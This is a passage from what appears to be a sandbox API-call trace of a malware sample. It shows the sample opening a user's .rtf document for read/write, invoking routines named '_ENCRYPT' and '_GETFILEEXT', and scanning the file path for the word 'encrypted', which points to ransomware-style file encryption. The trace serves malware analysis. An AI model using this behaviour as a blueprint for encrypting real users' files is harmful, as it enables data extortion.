(HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889970 [0034.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0034.538] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\6ymffx90.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.538] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.539] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.539] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.539] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.539] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0034.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889628, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.539] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.539] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.540] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.540] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.540] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.540] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.540] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.540] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0034.540] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.540] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.541] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0xcdb1bcd0, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 0x7c20c0 [0034.541] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.541] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.541] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0xcdb1bcd0, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 0x7c20c0 [0034.541] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.542] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.542] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, 